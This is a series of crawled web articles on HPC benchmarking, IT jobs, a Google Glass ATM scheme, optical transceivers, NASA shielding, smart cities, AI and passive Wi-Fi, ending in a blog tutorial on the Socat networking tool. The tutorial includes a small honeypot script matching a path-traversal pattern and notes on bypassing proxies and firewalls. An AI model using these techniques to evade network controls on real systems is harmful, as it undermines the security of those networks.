linear equations. To explain further, he cites a Sandia report (PDF) that talks about how today's high-performance computers emphasize data access instead of calculation. 
Thus, reliance on the old benchmarks "can actually lead to design changes that are wrong for the real application mix or add unnecessary components or complexity to the system," Dongarra says. The new benchmark will be called HPCG, for High Performance Conjugate Gradients. "This will augment the Top500 list by having an alternate benchmark to compare," he says. "We do not intend to eliminate HPL. We expect that HPCG will take several years to both mature and emerge as a widely visible metric."
The plea from IBM
Meanwhile, at IBM, researchers are proposing a new approach to computer architecture as a whole. Costas Bekas, head of IBM Research's Foundations of Cognitive Computing Group in Zurich and winner of the ACM's Gordon Bell Prize in 2013, agrees with Dongarra that today's high-performance computers have moved from being compute-centric to being data-centric. "This changes everything," he says. "We need to be designing machines for the problems they will be solving, but if we continue to use benchmarks that focus on one kind of application there will be pitfalls," he warns. Bekas says that his team is therefore advocating the use of conjugate gradients benchmarking, because conjugate gradients involve moving data in large matrices, rather than performing dense calculations. Beyond that, Bekas says his team is also pushing for a new computing design that combines both inexact and exact calculations -- the new conjugate gradients benchmarks having demonstrated enormous advantages in doing so. Basically, double-precision calculations (i.e., FLOPS) are needed only in a tiny minority of cases, he explains. The rest of the time the computer is performing rough sorting or simple comparisons, and precise calculations are irrelevant. IBM's prototypes "show that the results can be really game-changing," he says, because the energy required to reach a solution with a combination of exact and inexact computation is reduced by a factor of almost 300. With minimal use of full precision, the processors require much less energy and the overall solution is reached faster, further cutting energy consumption, he explains. Taking advantage of the new architecture will require action by application programmers. "But it will take only one command to do it," once system software modules are aware of the new computing methodology, Bekas adds. If Bekas' suggestions catch on, with benchmarks pushing machine design and machine design pushing benchmarks, it will actually be a continuation of the age-old computing and benchmarking pattern, says Smith. "I can't give you a formula saying 'This is the way to do a benchmark,'" Smith says. "But it must be complex enough to showcase the entire machine, it must be interesting on the technical side and it must have something marketing can use." When several firms use it for predictions, "it feeds on itself, as you build new hardware or software based on the benchmark. A result gets published, it pushes the competitive market up a notch, other vendors must respond and the cycle continues," he explains. This story, "Beyond FLOPS: The co-evolving world of computer benchmarking" was originally published by Computerworld.
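As a purely illustrative footnote to the Linpack discussion above (my own toy example using NumPy, not any of the official benchmarks), the kind of dense floating-point kernel these suites time can be sketched in a few lines; real benchmarks control far more variables, such as problem size, repetitions and numerical accuracy:

```python
# Estimate achieved FLOPS from one dense matrix-matrix multiplication.
import time
import numpy as np

n = 1024
a = np.random.rand(n, n)
b = np.random.rand(n, n)

start = time.perf_counter()
c = a @ b                          # dense matrix multiply, the classic HPL-style kernel
elapsed = time.perf_counter() - start

flop_count = 2 * n ** 3            # roughly 2*n^3 multiply-adds for an n x n matmul
print(f"{flop_count / elapsed / 1e9:.2f} GFLOPS in {elapsed * 1000:.1f} ms")
```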
<urn:uuid:80fc9863-8a2f-4a85-82c5-278e858ec549>
CC-MAIN-2017-09
http://www.itworld.com/article/2694705/hardware/beyond-flops--the-co-evolving-world-of-computer-benchmarking.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00062-ip-10-171-10-108.ec2.internal.warc.gz
en
0.943229
2,836
2.75
3
Think about your current information technology job – would it even have existed 15 years ago? Even if it did, it’s likely to have either dramatically grown or shrunk, depending on your job description. That’s according to the Pew Research Center, which analyzed data from the joint federal-state Occupational Employment Statistics program that sorts wage and salary workers into more than 800 different occupations. The program’s most recent estimates, which are based on data collected from November 2009 to May 2012, show that around 3.9 million workers – or 3 percent of the nation’s wage and salaried workforce – work in core IT jobs. How have IT jobs changed in the past 15 years? According to Pew’s analysis, some IT jobs, namely information security analysts and Web developers, simply didn’t exist, or at least did not fall under those titles. Other jobs, such as database administrators, software developers and computer support specialists, have expanded dramatically, while occupations like computer programming and computer operating have shrunk. “Since the World Wide Web was conceived 25 years ago, it’s become a major reason why computers, smartphones and other data/communication technologies are integral parts of most everyone’s daily lives,” Pew’s Drew DeSilva writes on Fact Tank. “Among other things, that means many more Americans are employed in developing, maintaining and improving those devices and the communications networks they use.” How has your view of the IT field, particularly in the federal space, changed over the past 15 years?
<urn:uuid:f83a0441-cf5b-41ca-821d-fb8b1750b290>
CC-MAIN-2017-09
http://www.nextgov.com/cio-briefing/wired-workplace/2014/03/how-it-jobs-have-changed-15-years/80659/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00062-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941144
324
2.734375
3
Taking photos with a wink, checking one's calendar with a glance of the right eye, reading text messages — the multinational corporation Google wants to make this possible with Google Glass. But what IT experts celebrate as a new milestone makes privacy groups skeptical. So far, few people have access to the prototype to test how it can be used in daily life. "Thanks to the Max Planck Institute for Informatics we are one of the few universities in Germany that can do research with Google Glass", says Dominique Schröder, assistant professor of Cryptographic Algorithms at Saarland University. Schröder, who also does research at the Center for IT-Security, Privacy and Accountability (CISPA), located only a few yards away, is aware of the data security concerns with Google Glass: "We know that you can use it to abuse data. But it can also be used to protect data." To prove this, Schröder and his group combine Google Glass with cryptographic methods and techniques from automated image analysis to create the software system "Ubic". By using Ubic, withdrawing money at a cash machine would change as follows: The customer identifies himself to the cash machine. The machine then requests the customer's public key from a trusted authority. It uses the key to encrypt the one-time personal identification number (PIN) and additionally seals it with a "digital signature", the digital counterpart of the conventional signature. The result shows up on the screen as a black-and-white pattern, a so-called QR code. The PIN hidden inside it is only visible to the identified wearer of the glasses. Google Glass decrypts it and shows it in the wearer's field of vision. "Although the process occurs in public, nobody is able to spy on the PIN", explains Schröder. This is not the case if PINs are sent to a smart phone. Spying on the PIN while it is being entered would also be useless, since the PIN is re-generated each time the customer uses the cash machine. An attacker also wearing a Google Glass is not able to spy on the process, either. The digital signature guarantees that no assailant is able to intrude between the customer and the cash machine, as happens during so-called "skimming", where the assailant can impersonate the customer. Only the customer is able to decrypt what was encrypted with the public key, using his secret key. As long as this is safely stored on the Google Glass, his money is also safe. At the computer expo CeBIT, the researchers will also present how Google Glass can be used to hide information. Several persons all wearing Google Glass can read the same document with encrypted text at the same time, but in their fields of vision they can only see the text passages that are intended for them. "This could be interesting, for example, for large companies or agencies that are collecting information in one document, but do not want to show all parts to everybody", explains Mark Simkin, who was one of the developers of Ubic. A large electric company has already sent a request to the computer scientists in Saarbrücken. Google Glass is expected to enter the American market this year.
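The flow described above can be approximated on any UNIX machine with standard tools. The sketch below is not the Ubic software — just a rough command-line illustration of the same encrypt-then-sign-then-QR pattern, with made-up file names (user.key/user.pub for the customer, atm.key/atm.pub for the cash machine) and assuming the qrencode utility is installed:
# Customer key pair (the private half would live on the glasses)
$ openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out user.key
$ openssl rsa -in user.key -pubout -out user.pub
# Cash machine: encrypt a one-time PIN with the customer's public key, sign the ciphertext, render a QR code
$ echo "4711" > pin.txt
$ openssl pkeyutl -encrypt -pubin -inkey user.pub -in pin.txt -out pin.enc
$ openssl dgst -sha256 -sign atm.key -out pin.sig pin.enc
$ base64 pin.enc | qrencode -o pin_qr.png
# Glasses: verify the machine's signature, then decrypt with the private key
$ openssl dgst -sha256 -verify atm.pub -signature pin.sig pin.enc
$ openssl pkeyutl -decrypt -inkey user.key -in pin.enc
In the real system the customer's private key never leaves the glasses, and the PIN is regenerated for every withdrawal, as the article notes.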
<urn:uuid:c52d8a8c-a6c5-4358-b8f2-360ca1337fe7>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2014/03/11/google-glass-offers-additional-security-to-atm-users/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00590-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947534
694
2.75
3
A fiber optic transceiver module is a self-contained component that can both transmit and receive. Each of these physical form factors is defined in a standards document known as a Multi-Source Agreement, or MSA. Optical transceiver types can generally be grouped into those supporting transmission speeds on the order of 1Gbps and those designed to support rates in the range of 10Gbps. The optical transceiver form factors associated with 10Gbps transmission are XFP, X2, XENPAK and SFP+. The XFP transceiver is a small form factor, hot-pluggable module designed for 10G network applications including 10 Gigabit Ethernet and Fibre Channel. XFP transceivers use a duplex LC interface, and the industry-acknowledged standard for XFP is called the XFP MSA. XFP is a hot-swappable and protocol-independent module, which means you can replace the component without shutting down the whole system; an XFP can be swapped without interrupting the operation of your system. It usually operates at optical wavelengths of 850 nm, 1310 nm, or 1550 nm. To use this module, your system should support one of these: 10 Gigabit Ethernet, 10 Gbit/s Fibre Channel, Synchronous Optical Networking at OC-192 rates, Synchronous Optical Networking STM-64, 10 Gbit/s Optical Transport Network OTU-2, or parallel optics links. XFP modules can operate on a single wavelength or use dense wavelength division multiplexing techniques. 10G SFP Plus: Compared with other 10G modules such as XFP, X2 and XENPAK, the SFP+ transceiver is the smallest 10G form factor. The SFP+ module is interchangeable with the SFP module and can be used in the same cages as SFP modules. SFP+ is an upgraded version of the small form-factor pluggable transceiver. SFP (small form-factor pluggable) is a compact, hot-pluggable transceiver used for both telecommunication and data communications applications. The electrical interface to the host board is the same serial interface for both SFP and SFP+ modules. SFP and XFP transceiver modules differ in some respects, such as size and speed: the SFP is smaller than the XFP, while the XFP carries more speed than the SFP. They are, however, similar in design. From FiberStore, we provide a full range of optical transceivers, such as SFP+ transceivers, X2 transceivers, XENPAK transceivers, XFP transceivers, SFP transceivers, GBIC transceivers, CWDM/DWDM transceivers, and PON transceivers. We can also customize optical transceivers to fit your specific requirements. If you want more information about fiber optic transceivers, please visit our website www.fs.com or follow our blog.
<urn:uuid:b1dcce5a-6b99-4db0-8740-3467c222551b>
CC-MAIN-2017-09
http://www.fs.com/blog/fiberstore-provide-10g-sfp-plus-transceiver-versus-xfp-transceiver.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172783.57/warc/CC-MAIN-20170219104612-00290-ip-10-171-10-108.ec2.internal.warc.gz
en
0.911916
621
2.671875
3
Start Creating Amazing Graphics and Illustrations. Learn to create amazing vector content from start to finish. If you are an eLearning developer or a graphic artist that supports a Learning Development team then you need to know how to leverage the drawing power of Adobe Illustrator. You don’t have time to sit through hours of online tutorials that show you how to perform a single task. This 1-Day class was developed for the express purpose of teaching you exactly how to create vector graphics for use in elearning rapid development applications like Articulate Storyline, Adobe Captivate and others. Cut through all of the fluff and get down to business with real-world examples in this project based class. Classes are taught on the latest version of Adobe Creative Cloud. - Learn essential skills in just one day! - Hands-on exercises - View class recordings for up to six months - Instruction from eLearning experts Lesson 1: Getting to Know the Work Area - Understanding “Workspaces” - Creating a Custom Workspace - Changing the view of Artwork - Creating New Illustrator Documents - Working with Artboards - Viewing and Arranging Multiple Documents Simultaneously Lesson 2: Creating and Editing Shapes - Drawing with Shape Tools - Working with Strokes - Selecting Objects - Aligning Objects - Grouping Objects - Using Layers to Stay Organized - Using Rulers and Guides - Scaling and Rotating Shapes - Moving and Duplicating Shapes Lesson 3: Drawing with the Pen and Pencil Tools - Getting Familiar with the Pen Tool - Working with Anchor Points - Drawing a Complex Shape with the Pen Tool - Editing your Pen Tool Shapes - Freehand Drawing with the Pencil Tool - Editing a Pencil Tool Drawing Lesson 4: Color - Understanding Color Modes - Mixing a Custom Color - Creating a Color Swatch - Importing Pantone Colors - Creating Gradients - Generating Color Themes Lesson 5: Creating a Character - Drawing the basic body shape - Illustrating arms and hands - Adding facial features - Developing additional poses and expressions - Marionette your character Lesson 6: Saving and Sharing Vector Content - Saving Your Work - Exporting for eLearning Production
<urn:uuid:ad75ceb6-cebe-41ed-8899-a68510f3e5cc>
CC-MAIN-2017-09
http://lodestone.com/online-training/adobe-illustrator-for-elearning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00235-ip-10-171-10-108.ec2.internal.warc.gz
en
0.858417
495
3.046875
3
Long term exposure to radiation is one of the biggest challenges in long-duration human spaceflights and NASA is now looking for what it called revolutionary technology that would help protect astronauts from the deadly matter. According to NASA: "Current conventional radiation protection strategy based on materials shielding alone, referred to as passive radiation shielding, is maturing (has been worked on for about three decades) and any progress using the materials radiation shielding would only be evolutionary (incremental) at best. Material shielding would have only limited or no potential for avoiding continuous exposure to radiation. In addition, current material shielding alone for radiation protection for long duration/deep space safe human space missions is prohibitive due to pay load and cost penalties and is not a viable option." What NASA says it is looking for rather is what it calls "Active radiation shielding" technology that it says could include confined and unconfined magnetic fields requiring super-conducting magnets, plasma shields, and electrostatic shields. From NASA: "The biggest advantage of active electrostatic radiation shielding is that by preventing ions from hitting the spacecraft, the unknown harmful biological effects of continuous long duration exposure to space radiation is significantly reduced for galactic cosmic rays and for solar particle events, of great concern for radiation exposure, it is practically eliminated. It is believed that the best strategy for radiation protection and shielding for long duration human missions is to use electrostatic active radiation shielding while, in concert, taking the full advantage of the state-of-the-art evolutionary passive (material) shielding technologies for the much reduced and weaken radiation that may escape and hit the spacecraft." NASA says the research it expects to see from partners will yield applications such as radiation protection and shielding, radiation dose exposures, sensors and medical applications. Radiation mitigation is part of NASA's list of Grand Challenges. From NASA Grand Challenges site: "Space is an extreme environment that is not conducive to human life. Today's technology can only partially mitigate the effects on the physical and psychological well-being of people. In order to live and effectively work in space for an extended period of time, people require technologies that enable survival in extreme environments; countermeasures that mitigate the negative effects of space; accommodations that optimize human performance; comprehensive space-based physiological and physical health management and prompt and comprehensive medical care in a limited infrastructure."
<urn:uuid:0f313704-faf4-4d72-9b68-a025db9fe7e8>
CC-MAIN-2017-09
http://www.networkworld.com/article/2228816/security/nasa-wants-revolutionary-radiation-shielding-technology.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00411-ip-10-171-10-108.ec2.internal.warc.gz
en
0.924546
513
3.671875
4
Analysts at Gartner have predicted that half of all smart city objectives will include climate change, resilience and sustainability by 2020. Speaking to an audience at the Gartner Symposium/ITXpo in Barcelona this week, Bettina Tratz-Ryan, research vice president at Gartner, outlined Gartner's thinking. She discussed how the Internet of Things (IoT) and data analytics will accelerate the development of smart cities. Ms. Tratz-Ryan indicated that as smart cities develop, cities are defining new objectives and measurable outcomes that meet the targets agreed upon at the COP 21 in Paris to reduce greenhouse gas (GHG) emissions. IoT to fight climate change "With the Horizon 2020 goals of energy efficiency, carbon emission reductions and renewable energy in mind, many cities in Europe have launched energy sustainability, resource management, social inclusion and community prosperity initiatives," Tratz-Ryan said in a statement by Gartner. The statement points out that a number of major cities (Singapore, Gothenburg, Bristol) have adopted schemes to improve traffic and mobility, while Tratz-Ryan noted the increase in ride sharing, as well as improved infrastructure for electric vehicles and congestion charges on combustion engines, as examples of cities pushing to tackle climate change. Central to the advancement and execution of climate change goals, Gartner says, are sensors. The company predicts that next year there will be 380 million connected things in use in cities to deliver sustainability and climate change goals, rising to 1.39 billion things by 2020. Smart commercial buildings and transportation will supposedly be the main contributors to this, representing 58 percent of all the IoT installed. In buildings "Implementing an integrated business management system (BMS) for lighting and heating and cooling can reduce energy consumption by 50 percent," claimed Tratz-Ryan. "This is a significant contribution to the commitments of cities to reduce their footprint of GHG." "Cities will become the environmental centers of excellence for new technology development, offering a stress test environment for the industry," said Tratz-Ryan. "The advantages for cities will be profound. They will not only meet their mandated targets of the Horizon 2020 goals, but also develop greener and more inclusive city conditions that citizens can acknowledge as KPIs." Reasons to be doubtful? IoB spoke to Clive Longbottom, analyst at Quocirca, for some expert opinion on these predictions. Longbottom was somewhat sceptical in his emailed comments, citing the power of money as an important factor in the development of smart cities. "All of these things are a fine balancing act between various variables that the designers and founders of a smart city have to consider," he told IoB. "The biggest of these variables is cost – while it is theoretically possible to create a zero-carbon city, the costs of doing so and of maintaining it would be prohibitive. As such, some compromises have to be taken." Longbottom also referenced the geopolitical factors at play here, notably the Trump factor. "If Trump does backtrack on the US commitments to changes to try and deal with climate change…then what will this mean to smart cities elsewhere?" he said.
“If they do everything they can while the US is building new cities where smog rules and the costs of housing, workers, factories and regulation are very low, can the countries looking to smart cities afford to be so practically pure in their approach?” “If Trump’s decisions mean that China backtracks, taking India, Brazil and other growth economies with it, then sustainability starts to plummet down the priority list of not only smart cities, but every single organization on the planet – it is the only way that they can remain competitive.” Longbottom has a point, though he does acknowledge that the sustainability message has some weight. “What I expect to see is an increase in the amount of greenwash that is seen,” he continued. “If the amount of energy used by a smart city can be lowered for cost reasons (for example, using natural lighting where possible and using LED lights everywhere else), it hits the main variable of cost. That LED lights, being low voltage, can be powered by cheap means (stored or direct solar power, for example) lowers the need for expensive distributed grid power.” Ultimately, however, Longbottom argues that “If the cost of putting in place such a system to save energy exceeded the lifetime savings, it wouldn’t get done – even if it did avoid those emissions and so meet the Paris agreements.”
<urn:uuid:aca7b337-7d7e-48b3-9f92-35f4fee79bb3>
CC-MAIN-2017-09
https://internetofbusiness.com/climate-change-smart-cities-gartner/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00587-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95171
974
2.671875
3
HPC Meets AI and Creates New Grand Challenges The intersection of HPC and AI is creating a vibrant new market: “High Performance Artificial Intelligence” (HPAI) that is fueling the growth of AI platforms and products. After decades of slow progress, HPC has given AI the boost it needed to be taken seriously. Enabled by supercomputing technologies, HPC techniques such as deep learning are transforming AI to make it practical for many new use cases. The necessary ingredients: - Big data, generated by digitized processes, sensors, and instruments - Massive computational power, often in the form of cloud computing, and - Economically attractive use cases are coming together to create a new breed of “Thinking Machines” that can automate complex tasks and decision processes, augmenting or replacing mechanical and electrical machines and people. The intersection of HPC and AI is showing that cognition can be computable in a practical way (see, for example, this 1978 paper titled “Computability and Cognition”). It represents a blend of logic processing with numerically intensive computation. It is an area of intense activity in academic, commercial, industrial, and government settings. HPAI combines HPC (numerically intensive statistical analysis and optimization) with traditional AI (search algorithms and expert systems) to profoundly impact the IT industry and customer investment priorities, to influence every aspect of human life, and to pose its own grand challenges. HPAI techniques, technology drivers and core technologies, characteristics, practical applications, and future directions are all important topics. Here, we focus on the future of HPAI. The Future of HPAI AI has been evolving for decades. Initial inference-based expert systems laid the foundation, and taught us how to formulate and solve AI problems. With deep learning and HPC technologies, AI is taking an evolutionary leap into a new phase. HPAI will include the following challenges and advances: Current algorithms make simplifying assumptions that will be relaxed in the future. In addition to the depth and breadth of layers, there will be cross-links connecting various layers, and dynamically created mini-layers, to provide more flexibility for deep neural networks. Furthermore, while current algorithms iteratively approach an optimum set of parameters, future algorithms will pursue many paths in parallel. More Realistic Neurons Current implementations of neuron models are simplistic, with S-curve like or other simple transfer functions. Real-world neurons have much richer connectivity, and often exhibit very spiky signaling behavior. The frequency of spikes can transmit information as well. Future neural nets will incorporate such additional complexity for higher accuracy and to achieve similar results with fewer neurons in the model. Computational complexity will increase, however. Deep learning is already accelerating new system architecture and component technologies. We expect a period of blossoming innovation across the board: accelerator technologies, new types of CPUs specifically optimized for new workloads, new data storage and processing models such as In-Situ Processing, and entirely novel approaches such as Quantum Computing. These will all evolve rapidly in the coming years. Natural language processing, augmented and virtual reality, haptic and gesture systems, and brain wave analysis are examples of new forms of interaction between humans and information machines. 
Synergy with IoT and HPC HPAI relies on large bodies of data, which are often generated by sensors and edge devices. Depending on the use case, this data can feed cognitive processing. At the same time, the quest for more accuracy across more and more fathomable situations will continue to justify the designation HPAI. Smart and Autonomous Devices Because learning can be separated from practice, and practice can be computationally cheap, a proliferation of smart devices can be expected. This trend is already visible but will expand to entirely new classes of devices. Edge devices, wearables, artificial limbs and exoskeletons, and near-permanent attachments such as smart contact lenses are examples. A special class of autonomous devices, robots aim to mimic humans and animals. As such, they not only perform tasks better than humans and perform tasks that humans are unable to perform. They will also become increasingly social. Turing tests will be passed. Humans are social animals and can easily develop emotional bonds with robots. This is the ultimate in integration of technology and humans into a single cognitive being. Cyborg technologies will become a permanent part of host humans. Challenges and Grand Challenges HPAI can help solve existing grand challenge problems by better integrating theory, simulation, and experiment, but it will create new grand challenges that span multiple disciplines. HPAI shows that sufficiently complex sets of equations can make cognition computable. But that same complexity makes them unpredictable. Consequences of AI systems are not always adequately or widely understood, and advanced applications of AI can be a monumental case of unintended consequences. In short, system complexity can easily exceed human competence. Like any advanced tool, AI can be used for good or evil. Most often, it is quite straightforward to tell whether the application of a technology is good or bad for its users or the society. With AI, this is not always simple. Current anxieties about AI include the imminent elimination of large classes of jobs by AI systems. Future concerns are about humans making a so-called Darwinian mistake: creating something that will threaten the survival of its creators. Counter arguments point to the still-primitive nature AI systems in terms of the breadth of its capabilities or the more nuanced aspects of human intelligence. An ethical framework, similar to that proposed by Asimov for robots, would allow a more structured discussion. Ethical concerns about AI are valid even as they temper the adoption of AI technologies and require formal efforts to study ethical implications of AI. Arguably a more important parameter than technological advances, and in light of its ethical complexities, AI poses significant challenges for legal systems, and requires new norms and legislation. We expect progress in this area will lag actual deployments of technologies and will be more reactive than proactive. Autonomy will be limited by the precise definition of the tasks that are automated, the environment (exact boundaries) in which they operate, and tolerance for mistakes. Of course, for some tasks, machines do not have to be perfect, but simply better than humans, or more practically, better than the specific human responsible for a task at a given time and place. In such cases, mistakes will be made. Being at peace with a mistake made by a machine may or may not be easier than that made by a human. 
Society is far from accepting mistakes made by machines at the same level for which human error is accepted. Fully autonomous systems are far from imminent. The intersection of HPC and AI has created the HPAI market, a vibrant and rapidly growing segment with far reaching implications not just for the IT industry but humanity as a whole. Driven by digitization and the dawn of the Information Age, HPAI relies on the presence of large bodies of data, advanced mathematical algorithms, and high performance hardware and software. Just as industrial machines ushered in a new phase in human history, new “information machines” will have a profound impact on every aspect of life. No different than industrial machines, information machines can help when the scope of their activity is fully defined. If it can be defined, it can be automated. Whether, or how well, it can be defined is the crux of the matter. Can we successfully program in Asimov’s three laws?
<urn:uuid:61e1a13b-d3dd-41c0-a504-14c5eac60417>
CC-MAIN-2017-09
https://www.enterprisetech.com/2016/11/11/hpc-meets-ai-creates-new-grand-challenges/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00111-ip-10-171-10-108.ec2.internal.warc.gz
en
0.923437
1,551
2.859375
3
By now, the power hogs on your smartphone and PC are well known: the display, the CPU, and the need to power up your Wi-Fi or 3G radio to send and receive data, all consume power and chip away at your battery life. But researchers have found a way to almost eliminate the power consumed by Wi-Fi, although you'll need some new chips inside your router and your smartphone. What researchers at the University of Washington are calling "passive Wi-Fi" slashes the power used by 802.11b transmissions to just 59 microwatts, or about 10,000 times less than a conventional Wi-Fi chip would consume. A spinoff, called Jeeva Wireless, has been formed with the intention of commercializing the so-called backscatter technology, the university said. Here's how it works: Imagine Wi-Fi as a flashlight of sorts, beaming data back and forth. Your router has a flashlight, pointed at your phone, and your phone has one as well. Passive Wi-Fi eliminates one of these flashlights and replaces it with a mirror. Your router still uses its existing Wi-Fi signal to send data to your mobile device; it's just that the passive Wi-Fi technology simply reflects it back. The stream of reflected, backscattered "off" and "on" signals transmits the data at up to 802.11b speeds, or 11Mbps. Researchers say that they've been able to transmit this data between 30 and 100 feet, using both line-of-sight and through-wall scenarios. Why this matters: It's possible that this could have a significant impact on how your phone sends and receives data. Unfortunately, it will probably require new hardware, both routers and mobile devices. But there's another scenario: passive Wi-Fi could emerge as an ultra-low-power alternative to Bluetooth, whose Low Energy derivative consumes power in the hundredths of watts, rather than the millionths of watts that passive Wi-Fi requires. That could make it an ideal solution for the Internet of Things. Passive Wi-Fi works on a few assumptions, one of the more important being that the analog and digital portions of the wireless radio have become increasingly decoupled. Passively listening for a digital signal doesn't take much power, relatively speaking; it's the analog broadcasting of a response signal that consumes most of it. Simply reflecting the signal eliminates the vast majority of this power. But something has to generate the transmission power—and in this case, it's a plugged-in device like a router. A router would require some form of a transceiver that could broadcast a wireless "tone" on a frequency that wouldn't interfere with the existing Wi-Fi channel. The passive Wi-Fi chip could then "reflect" that tone back at the receiver. But the researchers also said that the technical process of backscattering that information at a given frequency would also bring that tone back into the frequency range used by the Wi-Fi channel—allowing the router or receiver to make sense of it all. The problem is that a passive Wi-Fi system also means that the passive sensor can't call for attention, or signal the router that it's ready to transmit data. Instead, routers will have to "order" the passive Wi-Fi device to send data at a given time. That's not a big deal, although the latency might be a bit higher than normal. In any event, the promise of passive Wi-Fi is still a couple of years off. But it's a possible future that looks more and more intriguing as we use our mobile devices ever more frequently.
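A quick sanity check of those figures, using nothing fancier than the Unix bc calculator: 59 microwatts multiplied by the claimed factor of 10,000 works out to roughly 0.6 watts, which is indeed the right order of magnitude for a conventional Wi-Fi radio that is actively transmitting (actual draw varies by chipset).
$ echo "0.000059 * 10000" | bc -l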
This story, "'Passive Wi-Fi' researchers promise to cut Wi-Fi power by 10,000x" was originally published by PCWorld.
<urn:uuid:c69d54f1-1f0d-418c-85d6-8e61f33ef5ae>
CC-MAIN-2017-09
http://www.itnews.com/article/3036777/networking/passive-wi-fi-researchers-promise-to-cut-wi-fi-power-by-10000x.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00287-ip-10-171-10-108.ec2.internal.warc.gz
en
0.942121
822
3.28125
3
Infosec guys are lazy people. At least in my case! There is nothing more boring than typing long shell commands or performing recurring tasks. After all, computers are made to make our life easier. Let them work for us! UNIX is a wonderful environment. There are plenty of ways to automate tasks: shell scripts, Perl, Python, etc. When you need to interact with remote devices or servers, the classic tools are Netcat or Expect. Netcat is best known as the "Swiss army knife" of network administrators. Unfortunately, it cannot interact with the remote server. Expect is a powerful scripting tool based on scenarios like "If I receive this information, I do this action or send this information" but it has no network capabilities. During hack.lu last week, a friend explained how to solve a problem using another tool called "Socat". The name comes from the concatenation of "SOcket" and "cat" (the UNIX command to display files). This tool has existed for a few years but I had never heard of it. Basically, Socat is a tool to manipulate sockets, one input and one output. But the idea of sockets is too restrictive. The documentation speaks about "data channels" which can be combinations of:
- a file
- a pipe
- a device (ex: a serial line)
- a socket (IPv4, IPv6, raw, TCP, UDP, SSL)
- a FD (STDIN, STDOUT)
- a program or script
For each data channel, parameters can be added (port, speed, permissions, owners, etc). For those who use Netcat, the default features remain the same.
Example #1: To exchange data via a TCP session across two hosts:
hosta$ socat TCP4-LISTEN:31337 OPEN:inputfile,creat,append
hostb$ cat datafile | socat - TCP4:hosta:31337
Example #2: To use a local serial line (to configure a network device or access a modem) without a terminal emulator:
$ socat READLINE,history=/tmp/serial.cmds /dev/ttyS0,raw,echo=0
The "READLINE" data channel uses GNU readline to allow editing and reusing input lines like a classic shell.
Example #3: To grab some HTTP content without a browser:
$ cat <<EOF | socat - TCP4:blog.rootshell.be:80
GET / HTTP/1.1
Host: blog.rootshell.be

EOF
Example #4: To use Socat to collect Syslog messages:
# socat -u UDP4-LISTEN:5140,reuseaddr,fork OPEN:/tmp/syslog.msg,creat,append
Any UDP packet sent to the listening port will be logged in /tmp/syslog.msg. Those examples are nice but how to interact with the flows received from the data channel? The "EXEC" channel allows us to specify an external program or script. Using the "fdin=" and "fdout=" parameters, it is easy to parse the information received from the input channel and to send back information.
$ socat TCP4:188.8.131.52:31337 EXEC:parse.sh,fdin=3,fdout=4
The following Bash script simulates a web server and can look for suspicious content. If none is found, the visitor is redirected to another site. Note that, for security reasons, "EXEC" does not allow a relative path for the executable. It must be present in your $PATH.
#!/bin/bash
#
# Simple example of honeypot running on HTTP
# Usage: socat TCP4-LISTEN:80,reuseaddr,fork EXEC:honeypot.sh,fdin=3,fdout=4
# FD 3 = incoming traffic
# FD 4 = traffic sent back to the client
#
# Define the patterns for bad traffic here
BADTRAFFIC1="../../.."
BADTRAFFIC2="foobar"
# Process the received HTTP headers
while read -u 3 BUFFER
do
  # An empty header line (a bare carriage return) marks the end of the request headers
  [ "$BUFFER" = $'\r' ] && break
  echo "$BUFFER" | egrep -q -o "($BADTRAFFIC1|$BADTRAFFIC2)"
  if [ "$?" = "0" ]; then
    echo "ALERT: Suspicious HTTP: $BUFFER" >>http.log
    cat <<END0 >&4
<html>
<body>
<h1>This incident has been logged...</h1>
</body>
</html>
END0
    exit 0
  fi
done
cat <<END1 >&4
<html>
<meta http-equiv="refresh" content="0; url=https://blog.rootshell.be">
<body>
You will be redirected soon...
</body>
</html>
END1
By using the file descriptors 3 and 4, we can easily read what's sent by the client and send data into the TCP session. As seen in the examples above, Socat can be used to set up small servers to serve specific content or catch users. It can parse data and react based on the content. It can be used to redirect ports, bypass proxies, firewalls and much more! Commands like Socat have plenty of options which cannot all be reviewed here. Have a look at the man page for a good overview of all the features. Socat runs on almost all UNIX flavors (MacOS too) and a Cygwin version is available for Windows environments. It's a must-have in the personal toolbox of any pentester or security guy…
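One more illustration of the port-redirection use mentioned above — the addresses are placeholders, not anything from a real network: a single line exposes an internal web server on a local port, forking one child process per client.
$ socat TCP4-LISTEN:8080,reuseaddr,fork TCP4:10.0.0.5:80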
<urn:uuid:38fcb05b-9288-4ccf-947a-7f4a1097140f>
CC-MAIN-2017-09
https://blog.rootshell.be/2010/10/31/socat-another-network-swiss-army-knife/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00287-ip-10-171-10-108.ec2.internal.warc.gz
en
0.798364
1,210
2.78125
3
